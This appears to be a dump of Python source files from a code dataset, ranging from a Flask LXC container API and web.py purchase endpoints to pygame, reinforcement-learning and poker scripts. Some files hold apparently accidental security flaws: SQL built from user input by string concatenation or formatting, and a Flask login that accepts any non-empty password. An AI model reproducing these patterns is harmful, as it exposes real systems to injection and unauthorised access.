transform_date(i['created_at']))\n for idx, i in enumerate(repositories)))\n else:\n output_text_buffer.append('\\n'.join(i['full_name'] for i in repositories))\n\n self._output_text = '\\n'.join(output_text_buffer)\n return self._output_text\n\n def create_query(self, time_range):\n return ''.join([ApplicationContext.ROOT_ENDPOINT, self.PATH_SEARCH, self.get_query_str(time_range)])\n\n def run(self):\n time_diff = 10\n time_range = get_time_range(time_diff)\n request_url = self.create_query(time_range)\n\n # Collection of items gathered throughout api calls and processed for output\n items = []\n total_repo_count = 0\n if self.sort_type == 'default':\n while True:\n # Gather items and sort them by creation date\n # GitHub api doesn't support sort by creation date\n request = requests.get(request_url)\n content = request.json()\n\n try:\n items.extend(content['items'])\n except KeyError: # This error repeats if API limit is exceeded\n print(\"Error, API limit is most likely exceeded, try again in a bit.\")\n print(\"Here is message:\")\n print(content['message'])\n exit(2)\n\n total_repo_count += content['total_count']\n\n if total_repo_count > self.entry_number:\n # each request can only contain up to 100 entries\n # gather them with multiple requests by traversing the list like structure\n try:\n request_url = request.links['next']['url']\n continue\n except KeyError:\n break\n elif total_repo_count == self.entry_number:\n break\n else:\n # Our search query contains less item then we need,\n # Increase range for filtering and re-try\n try:\n if len(items) == 0:\n # Multiply search range by 6 if there are no entries\n time_diff *= 6\n time_range = get_time_range(time_diff)\n else:\n # Multiply search range by 3 starting from creation date of last entry in range\n time_diff *= 3\n last_date = min(items, key=sort_by_creation_date)['created_at']\n # Reduced by 1 second to ensure no duplicates\n time_range = get_time_range(time_diff,\n time_higher=load_api_date(last_date) - timedelta(seconds=1))\n\n request_url = self.create_query(time_range)\n continue\n except KeyError:\n break\n\n items = sorted(items, key=sort_by_creation_date, reverse=True)\n\n else:\n request = requests.get(request_url)\n content = request.json()\n items.extend(content['items'])\n\n self._repository_list = items[0:self.entry_number]\n", "sub_path": "github_browser/application_context/list_application_context.py", "file_name": "list_application_context.py", "file_ext": "py", "file_size_in_byte": 5353, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "github_browser.time_adapter.get_time_range", "line_number": 21, "usage_type": "call"}, {"api_name": "github_browser.time_adapter.transform_date", "line_number": 48, "usage_type": "call"}, {"api_name": "github_browser.time_adapter.get_time_range", "line_number": 61, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 71, "usage_type": "call"}, {"api_name": "github_browser.time_adapter.get_time_range", "line_number": 101, "usage_type": "call"}, {"api_name": "github_browser.time_adapter.sort_by_creation_date", "line_number": 105, "usage_type": "name"}, {"api_name": "github_browser.time_adapter.get_time_range", "line_number": 107, "usage_type": "call"}, {"api_name": "github_browser.time_adapter.load_api_date", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 108, "usage_type": "call"}, {"api_name": "github_browser.time_adapter.sort_by_creation_date", "line_number": 115, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "163548935", "text": "import pygame\nimport src.colours as colours\nfrom src.entity import Entity\nfrom pygame.math import Vector2\n\nclass Particle(Entity):\n\n def __init__(self, pos: Vector2, width, height, ttl, colour):\n Entity.__init__(self, pos.x, pos.y, width, height, None)\n # Not sure why we need to manually set pygame's layer?\n # even calling move_to_front didn't work.\n self._layer = 1\n self.pos = pos\n self.image = pygame.Surface((width, height)).convert_alpha()\n self.image.fill(colour)\n self.ttl = ttl\n\n def update(self, dt):\n self.ttl -= 1\n", "sub_path": "src/game_object/particle.py", "file_name": "particle.py", "file_ext": "py", "file_size_in_byte": 596, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "src.entity.Entity", "line_number": 6, "usage_type": "name"}, {"api_name": "pygame.math.Vector2", "line_number": 8, "usage_type": "name"}, {"api_name": "src.entity.Entity.__init__", "line_number": 9, "usage_type": "call"}, {"api_name": "src.entity.Entity", "line_number": 9, "usage_type": "name"}, {"api_name": "pygame.Surface", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "161021598", "text": "#!/usr/bin/env python\n\n# lxc-api , created 7/2014\n# Create by Chris Haessig\n\n\n# Import Yaml, Flash nad custom LXC library\n\nfrom yaml import safe_load\nfrom flask import Flask, session, redirect, url_for, escape, request\napp = Flask(__name__)\nfrom lxc import lxccontrol\n\n# Example Text\n\nexample_text = \"\"\"\nGET /login - Auth to server
\nGET /list - List all the LXC containers
\nGET /create// - Create a LXC
\nGET /destroy/ - Destroy LXC
\nGET /freeze/ - Freeze a LXC
\nGET /unfreeze/ - Unfreeze a LXC
\nGET /snapshot/ - Snapshot a LXC
\n\"\"\"\n\n# Open Yaml file and grab values\n\nwith open(\"api.yaml\") as f:\n y = f.read()\n\nyam = safe_load(y)\nusername = yam['username']\npassword = yam['password']\ntoken = yam['token']\nport = yam['port']\nhost = yam['host']\n\n# List all LXC\n\n@app.route('/list')\ndef list():\n if 'LoggedIn' in session:\n return lxccontrol(\"list\")\n else:\n return \"\"\n\n\n# Default, does nothing\n\n@app.route('/')\ndef index():\n if 'LoggedIn' in session:\n return 'Ready...'\n return redirect(url_for('login'))\n\n# Login to lxc-api\n\n@app.route('/login', methods=['GET','POST'])\ndef login():\n if request.method == 'POST':\n if request.form['username'] == username and request.form['password']:\n session['LoggedIn'] = \"yes\"\n return redirect(url_for('index'))\n return '''\n
{0}\n '''.format(example_text)\n\n# Logout\n\n@app.route('/logout')\ndef logout():\n # remove the username from the session if it's there\n if 'LoggedIn' in session:\n session.pop('LoggedIn', None)\n return redirect(url_for('index'))\n else:\n return \"\"\n\n\n# Stop LXC\n\n@app.route('/stop/')\ndef delete(machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"stop\",machine)\n\n# Start LXC\n\n@app.route('/start/')\ndef start(machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"start\",machine)\n else:\n return \"\"\n\n# Snapshot LXC\n\n@app.route('/snapshot/')\ndef snapshot(machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"snapshot\",machine)\n else:\n return \"\"\n\n# Freeze LXC\n\n@app.route('/freeze/')\ndef freeze(machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"freeze\",machine)\n else:\n return \"\"\n\n# Unfreeze LXC\n\n@app.route('/unfreeze/')\ndef unfreeze(machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"unfreeze\",machine)\n else:\n return \"\"\n \n# Destroy LXC\n\n@app.route('/destroy/')\ndef destroy(machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"destroy\",machine)\n else:\n return \"\"\n\n@app.route('/create//')\ndef create(types,machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"create\",machine,types)\n else:\n return \"\"\n\n\n\n# Set session token\n\napp.secret_key = token\n\nif __name__ == '__main__':\n app.run(host,port)\n\n", "sub_path": "api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 3103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 42, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 61, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 88, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 95, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 104, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 105, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 113, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 122, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 131, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 138, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 139, "usage_type": "call"}]}
+{"seq_id": "276288275", "text": "import ENV\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom RFL import DeepQNetwork\nfrom matplotlib import animation\n#import collections\n\n#def init(): #to plot the GIF\n# line.set_ydata(Func.BeamFunc(xxx))\n# return line,\n\ndef update(i): #to plot the GIF\n Wave.set_ydata(ENV.BeamFunc(Plot_data[i]))\n return Wave,\n\ndef run():\n step = 0\n #compare = lambda x, y: collections.Counter(x) == collections.Counter(y) \n for episode in range(100):\n # initial observation\n observation = ENV.reset() #get the initial observaion (position)\n rewards= [] #record rewards in the episode \n Plot_data= [] #record the observation (position) to plot\n Init_X= observation #the initial observation (position)\n \n while True:\n # RL choose action based on observation\n action = RL.Choose_Actions(observation)\n\n # RL take action and get next observation, reward, next Maximal side-lobe\n observation_, reward, done, MSL_ = ENV.step(action, observation)\n \n rewards.append(reward)\n print(\"Episode:\", episode)\n print(\"Step\", step)\n print(\"Max Side Lobe:\", MSL_)\n print(\"Position:\", observation)\n print(\"reward:\", sum(rewards)) \n print('*'*40)\n #if compare(observation, observation_):\n # print(\"SAME\")\n #else:\n # print(\"Different\")\n \n RL.store_transition(observation, action, reward, observation_) #store the data\n \n if (step > 200) and (step % 5 == 0): #當步數大於200後, 每5步學習一次\n RL.learn()\n \n observation = observation_# swap observation\n \n Plot_data.append(observation)\n \n # break while loop when end of this episode\n if done:\n break\n step += 1\n\n print('Complete')\n \n return Plot_data, Init_X\n \n \n \nif __name__ == \"__main__\":\n RL = DeepQNetwork(40, 20,\n learning_rate=0.01,\n reward_decay=0.9,\n e_greedy=0.9,\n replace_target_iter=200,\n memory_size=2000,\n # output_graph=True\n )\n \n Plot_data, Init_X= run()\n \n fig, ax = plt.subplots()\n theta= np.arange(0, np.pi, 0.001)\n \n Wave0= ax.plot(theta*180/np.pi, ENV.BeamFunc(Init_X), 'r--') #plot the initial wave (red line)\n Wave,= ax.plot(theta*180/np.pi, ENV.BeamFunc(Init_X), 'b--') #update the wave (blue line), \",\"為了更新值時的類型匹配\n \n ax.set_xlabel(r'$theta$')\n ax.set_ylabel(r'$dB$')\n\n ax.axis([0,180,-30,0])\n ax.grid(color= 'g', linestyle= '--', linewidth= 1, alpha= 0.4)\n \n \n ani= animation.FuncAnimation(fig, update, frames=len(Plot_data), interval=100, blit=False) #get dymanic Waves\n ani.save('4.gif', writer='imagemagick') #save the GIF\n \n plt.show()\n \n RL.plot_cost()#!/usr/bin/env python3\n", "sub_path": "Run.py", "file_name": "Run.py", "file_ext": "py", "file_size_in_byte": 3141, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "ENV.BeamFunc", "line_number": 13, "usage_type": "call"}, {"api_name": "ENV.reset", "line_number": 21, "usage_type": "call"}, {"api_name": "ENV.step", "line_number": 31, "usage_type": "call"}, {"api_name": "RFL.DeepQNetwork", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 80, "usage_type": "attribute"}, {"api_name": "ENV.BeamFunc", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 81, "usage_type": "attribute"}, {"api_name": "ENV.BeamFunc", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.animation", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}]}
+{"seq_id": "616122441", "text": "import sqlite3\n\nconn = sqlite3.connect('db — копия.sqlite')\nc = conn.cursor()\n\na = str(input(\"Введи название таблицы: sbc_live, sbc_osn, sbc_prod, trade \" + '\\n', 'red'))\nid = str(input(\"Введи id строки в таблице\" + '\\n'))\nname = str(input(\"Введи значение поля 'name'\" + '\\n'))\n\nup = \"UPDATE\" + \" \" + a + \" \" + \"SET\" + \" \" + \"name=\" + \"'\" + name + \"'\" + \"WHERE id=\" + \"'\" + id + \"'\"\nc.execute(up)\nconn.commit()\n\nfile_id = str(input(\"Введи значение поля 'file_id'\" + '\\n'))\nup = \"UPDATE\" + \" \" + a + \" \" + \"SET\" + \" \" + \"file_id=\" + \"'\" + file_id + \"'\" + \"WHERE id=\" + \"'\" + id + \"'\"\nc.execute(up)\nconn.commit()\n\ntxt = str(input(\"Введи значение поля 'txt'\" + '\\n'))\nup = \"UPDATE\" + \" \" + a + \" \" + \"SET\" + \" \" + \"txt=\" + \"'\" + txt + \"'\" + \"WHERE id=\" + \"'\" + id + \"'\"\nc.execute(up)\nconn.commit()\nprint(\"Готово\")\n\nc.close()\nconn.close()", "sub_path": "sqlite_manager BETA/sqlite_manager.py", "file_name": "sqlite_manager.py", "file_ext": "py", "file_size_in_byte": 938, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sqlite3.connect", "line_number": 3, "usage_type": "call"}]}
+{"seq_id": "581593628", "text": "import web\nimport json\nfrom logger.logger import *\nfrom data.dataAccess import *\nfrom data.security import *\nfrom data.purchase import *\nfrom data.client import *\nfrom factory.purchase import *\n\nclass Purchase:\n\tdef GET(self, statusId):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"CALL Tejuana.PurchaseList({0})\".format(statusId))\n\t\t\treturn purchaseListFactory(results)\n\n\tdef POST(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\tpurchase = json.loads(data)\n\t\t\tinsertPurchase(purchase)\n\nclass PurchaseStatus:\n\tdef GET(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"SELECT * FROM Tejuana.Purchase_Status\")\n\t\t\treturn purchaseStatusFactory(results)\n\n\nclass Client:\n\tdef GET(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tsearch = web.ctx.env.get('QUERY_STRING').split('=')[1]\n\t\t\tresults = query(\"CALL Tejuana.ClientsBy('{0}')\".format(search))\n\t\t\taddresses = query(\"CALL Tejuana.AddressesBy('{0}')\".format(search))\n\t\t\treturn clientListFactory(results, addresses)\n\n\tdef PUT(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\tclient = json.loads(data)\n\t\t\tupdateClient(client)\n\n\tdef POST(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\tclient = json.loads(data)\n\t\t\tinsertClient(client)\n", "sub_path": "rest/purchase.py", "file_name": "purchase.py", "file_ext": "py", "file_size_in_byte": 1433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "web.ctx.env.get", "line_number": 12, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 12, "usage_type": "attribute"}, {"api_name": "web.ctx.env.get", "line_number": 17, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 17, "usage_type": "attribute"}, {"api_name": "data.dataAccess", "line_number": 18, "usage_type": "name"}, {"api_name": "web.data", "line_number": 18, "usage_type": "call"}, {"api_name": "data.dataAccess", "line_number": 19, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 20, "usage_type": "call"}, {"api_name": "data.dataAccess", "line_number": 20, "usage_type": "argument"}, {"api_name": "web.ctx.env.get", "line_number": 25, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 25, "usage_type": "attribute"}, {"api_name": "web.ctx.env.get", "line_number": 32, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 32, "usage_type": "attribute"}, {"api_name": "web.ctx.env.get", "line_number": 33, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 33, "usage_type": "attribute"}, {"api_name": "web.ctx.env.get", "line_number": 39, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 39, "usage_type": "attribute"}, {"api_name": "data.dataAccess", "line_number": 40, "usage_type": "name"}, {"api_name": "web.data", "line_number": 40, "usage_type": "call"}, {"api_name": "data.dataAccess", "line_number": 41, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 42, "usage_type": "call"}, {"api_name": "data.dataAccess", "line_number": 42, "usage_type": "argument"}, {"api_name": "web.ctx.env.get", "line_number": 46, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 46, "usage_type": "attribute"}, {"api_name": "data.dataAccess", "line_number": 47, "usage_type": "name"}, {"api_name": "web.data", "line_number": 47, "usage_type": "call"}, {"api_name": "data.dataAccess", "line_number": 48, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 49, "usage_type": "call"}, {"api_name": "data.dataAccess", "line_number": 49, "usage_type": "argument"}]}
+{"seq_id": "278612056", "text": "from rest_framework import viewsets, exceptions\nfrom rest_framework.response import Response\nfrom . import models\nfrom . import serializers\nfrom catalogues import models as catalogues_models\n\n\nclass AssignedCarsView(viewsets.ModelViewSet):\n serializer_class = serializers.AssignedCarSerializer\n queryset = models.AssignedCars.objects.all()\n\n def retrieve(self, request, *args, **kwargs):\n try:\n user = catalogues_models.Users.objects.get(\n pk=self.kwargs.get('pk')\n )\n except catalogues_models.Users.DoesNotExist:\n raise exceptions.NotFound({'message': 'El usuario no existe'})\n instance = models.AssignedCars.objects.filter(\n idUser=user\n )\n response = serializers.AssignedCarSerializer(\n instance,\n many=True\n )\n return Response(response.data)\n\n\nclass UsedCarsView(viewsets.ModelViewSet):\n serializer_class = serializers.UsedCarSerializer\n queryset = models.UsedCar.objects.all()\n", "sub_path": "control/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1027, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 8, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 8, "usage_type": "name"}, {"api_name": "catalogues.models.Users.objects.get", "line_number": 14, "usage_type": "call"}, {"api_name": "catalogues.models.Users", "line_number": 14, "usage_type": "attribute"}, {"api_name": "catalogues.models", "line_number": 14, "usage_type": "name"}, {"api_name": "catalogues.models.Users", "line_number": 17, "usage_type": "attribute"}, {"api_name": "catalogues.models", "line_number": 17, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.NotFound", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.exceptions", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 29, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 29, "usage_type": "name"}]}
+{"seq_id": "413046838", "text": "import sys\nimport youtube_dl\nimport os\nimport googleapiclient.discovery\nimport json\n\nclass YoutubeDownloader:\n API_SERVICE_NAME = \"youtube\"\n API_VERSIONE = \"v3\"\n YDL_OPTS = {\n 'outtmpl': 'preview.mp3', \n 'format': 'bestaudio/best',\n 'noplaylist': True,\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }]\n }\n \n def __init__(self):\n with open('api_key.json') as f:\n data = json.load(f)\n developer_key = data['api-key']\n self.youtube = googleapiclient.discovery.build(self.API_SERVICE_NAME, self.API_VERSIONE, developerKey = developer_key)\n\n def download_song(self, url):\n try:\n youtube_dl.YoutubeDL(self.YDL_OPTS).download([url])\n return url\n except youtube_dl.utils.DownloadError:\n return False \n \n def search(self, name, artists):\n # can make cleaner\n search_name = name\n for artist in artists:\n if artist in name:\n continue\n search_name = search_name + \" \" + artist\n \n search_name = search_name + \" audio\"\n print(search_name)\n request = self.youtube.search().list(\n q = search_name,\n part=\"id\",\n maxResults=3\n )\n\n response = request.execute()\n if response['pageInfo']['totalResults'] <= 0:\n return False\n for v in response['items']:\n if v['id']['kind'] == \"youtube#video\":\n # getting the specific video id for each video in the playlist\n song = v\n \n print(song)\n # downloading a specific youtube video\n return 'https://www.youtube.com/watch?v='+song['id']['videoId']", "sub_path": "spotify_dl/youtube_downloader.py", "file_name": "youtube_downloader.py", "file_ext": "py", "file_size_in_byte": 1829, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "json.load", "line_number": 23, "usage_type": "call"}, {"api_name": "googleapiclient.discovery.discovery.build", "line_number": 25, "usage_type": "call"}, {"api_name": "googleapiclient.discovery.discovery", "line_number": 25, "usage_type": "attribute"}, {"api_name": "googleapiclient.discovery", "line_number": 25, "usage_type": "name"}, {"api_name": "youtube_dl.YoutubeDL", "line_number": 29, "usage_type": "call"}, {"api_name": "youtube_dl.utils", "line_number": 31, "usage_type": "attribute"}]}
+{"seq_id": "516870135", "text": "#coding:utf-8\n\nimport json\n\n__metaclass__= type\n\n__all__= [ u'get_combat_cfg', u'clear_combat_cfg', u'load_combat_cfg', u'cfg2combat' ]\n\n\n# combat_cfg= {\n# u'image' : u'image path',\n# u'self_camp' : self_camp,\n# u'enemy_camp' : enemy_camp,\n# u'name' : u'scene_name',\n# u'light' : light,\n# u'dark' : dark,\n# u'chaos' : chaos,\n# u'dlight_min' : dlight_min,\n# u'dlight_max' : dlight_max,\n# u'ddark_min' : ddark_min,\n# u'ddark_max' : ddark_max,\n# u'dchaos_min' : dchaos_min,\n# u'dchaos_max' : dchaos_max,\n# u'character_cfg_ids' : [\n# character_cfg_id,\n# ],\n# u'on_update' : u'callback_name',\n# }\n\n_id2combat_cfg= {}\n\ndef get_combat_cfg( cfg_id ) :\n return _id2combat_cfg.get( cfg_id, None )\n\ndef clear_combat_cfg() :\n _id2combat_cfg.clear()\n\ndef load_combat_cfg( file_path ) :\n with open( file_path, u'rU' ) as fp :\n id2data= json.load( fp )\n _id2combat_cfg.update( id2data )\n\n\ndef cfg2combat( cfg, combat ) :\n combat.name= cfg[u'name']\n combat.light= cfg[u'light']\n combat.dark= cfg[u'dark']\n combat.chaos= cfg[u'chaos']\n combat.light_max= cfg[u'light_max']\n combat.dark_max= cfg[u'dark_max']\n combat.chaos_max= cfg[u'chaos_max']\n combat.dlight_min= cfg[u'dlight_min']\n combat.dlight_max= cfg[u'dlight_max']\n combat.ddark_min= cfg[u'ddark_min']\n combat.ddark_max= cfg[u'ddark_max']\n combat.dchaos_min= cfg[u'dchaos_min']\n combat.dchaos_max= cfg[u'dchaos_max']\n\n\n", "sub_path": "game/combat.py", "file_name": "combat.py", "file_ext": "py", "file_size_in_byte": 1493, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "json.load", "line_number": 40, "usage_type": "call"}]}
+{"seq_id": "573573957", "text": "import openpyxl\nclass doExcel:\n def do_excel(self,button,caseid):\n wb=openpyxl.load_workbook(\"readData.xlsx\")\n sheet = wb[\"testData\"]\n headers =[]\n for i in range(1,6):\n headers.append(sheet.cell(1,i).value)\n # print(headers)\n\n test_data=[]\n for i in range(2,6):\n sub_data ={}\n for j in range(1,6):\n # print(sheet.cell(i,j).value)\n sub_data[headers[j-1]]=sheet.cell(i,j).value\n test_data.append(sub_data)\n if button == 'on':\n final_data = test_data\n else:\n final_data = []\n for item in test_data:\n if item['caseid'] in caseid:\n final_data.append(item)\n return final_data\n def writeBack(self,row,actualres,testres):\n wb = openpyxl.load_workbook(\"readData.xlsx\")\n sheet = wb['testData']\n sheet.cell(row,6).value = actualres\n sheet.cell(row,7).value = testres\n wb.save('readData.xlsx')\n\n#\nif __name__ == '__main__':\n res =doExcel().do_excel('on',[1,2])\n print(res)", "sub_path": "ut_demo_01/readfromexcel.py", "file_name": "readfromexcel.py", "file_ext": "py", "file_size_in_byte": 1119, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "openpyxl.load_workbook", "line_number": 4, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "429019722", "text": "\nimport numpy as np\nimport logging\n\nlogging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s',\n level=logging.INFO)\n\n\ndef truncated_normal(mean, stddev, minval, maxval):\n \"\"\"\n Method to draw a random number from a truncated normal distribution\n\n Args:\n mean (int): mean of distribution\n stddev (float): standard deviation of distribution\n minval (int): lower boundary\n maxval (int): upper boundary\n\n Returns:\n (int): the number drawn\n \"\"\"\n return int(np.clip(np.random.normal(mean, stddev), minval, maxval))\n\n\nclass Player(object):\n \"\"\"\n Poker player object capable of playing games\n Takes action and decide about amount to be bet by prompting user\n\n Attributes:\n initial_stack (int): amount of chips he started with\n stack (int): amount of chips he owns at any given time\n name (str): name of the player\n \"\"\"\n\n def __init__(self, stack, name):\n \"\"\"\n Instantiating the object using a numeric stack and a name\n e.g. Player(100,\"Joe\")\n \"\"\"\n self.initial_stack = stack\n self.stack = stack\n self.name = name\n\n def reset_stack(self):\n \"\"\"\n Reset stack to initial amount\n \"\"\"\n logging.debug('{} resets its stack from {}$ to {}$'\n .format(self.name, self.stack, self.initial_stack))\n self.stack = self.initial_stack\n\n def bet_amount(self, bet_size):\n \"\"\"\n Adjust stack based on amount player is betting\n Player is all-in if bets more than stack\n\n Args:\n bet_size (int): any number\n \"\"\"\n if bet_size >= self.stack:\n logging.debug('{} bets {}$ into the pot and is ALL-IN'\n .format(self.name, self.stack))\n self.stack = 0\n else:\n self.stack = self.stack - bet_size\n logging.debug('{} bets {}$ into the pot'\n .format(self.name, bet_size))\n\n def win_pot(self, pot_size):\n \"\"\"\n Adjust stack based on amount player is winning\n\n Args:\n pot_size (int): any number\n \"\"\"\n self.stack = self.stack + pot_size\n logging.debug('{} wins the pot: +{}$'\n .format(self.name, pot_size))\n\n def split_pot(self, pot_size):\n \"\"\"\n Adjust stack based on amount player is getting from a split pot\n\n Args:\n pot_size (int): any number\n \"\"\"\n self.stack = self.stack + int(pot_size/2)\n logging.debug('{} splits the pot: +{}$'\n .format(self.name, int(pot_size/2)))\n\n def get_back_from_pot(self, amount):\n \"\"\"\n Adjust stack based on amount player is getting back from a pot where he\n has put in more in the pot than the other player has chips,\n and the other player end up going all in\n\n Args:\n amount (int): any number\n \"\"\"\n self.stack = self.stack + amount\n logging.debug('{} gets +{}$ back from the pot'\n .format(self.name, amount))\n\n def choose_amount(self, minimum=None, maximum=None,\n pot_size=None, std_dev=50):\n \"\"\"\n Getting amount to bet from player by selecting an amount randomly\n by drawing a number from a truncated normal distribution centered\n around the pot size - only relevant for No Limit version of the game\n\n Args:\n minimum (int): minimum amount that is required, default None\n maximum (int): maximum amount that is required, default None\n pot_size (int): amount in pot at the moment of decision, used as\n the mean of the distribution , default None\n std_dev (float): standard deviation of the distribution,\n default is set arbitrarily to 50\n\n Returns:\n bet_size (int): the amount to bet\n \"\"\"\n if self.stack <= minimum:\n bet_size = self.stack\n elif maximum:\n bet_size = truncated_normal(pot_size, std_dev, minimum, maximum)\n else:\n bet_size = truncated_normal(pot_size, std_dev, minimum, maximum)\n self.bet_amount(bet_size)\n return bet_size\n\n def __eq__(self, other):\n return self.__dict__ == other.__dict__\n", "sub_path": "pokerbot/flow_control/.ipynb_checkpoints/player-checkpoint.py", "file_name": "player-checkpoint.py", "file_ext": "py", "file_size_in_byte": 4346, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.basicConfig", "line_number": 5, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 6, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 22, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 49, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 62, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 67, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 78, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 89, "usage_type": "call"}, 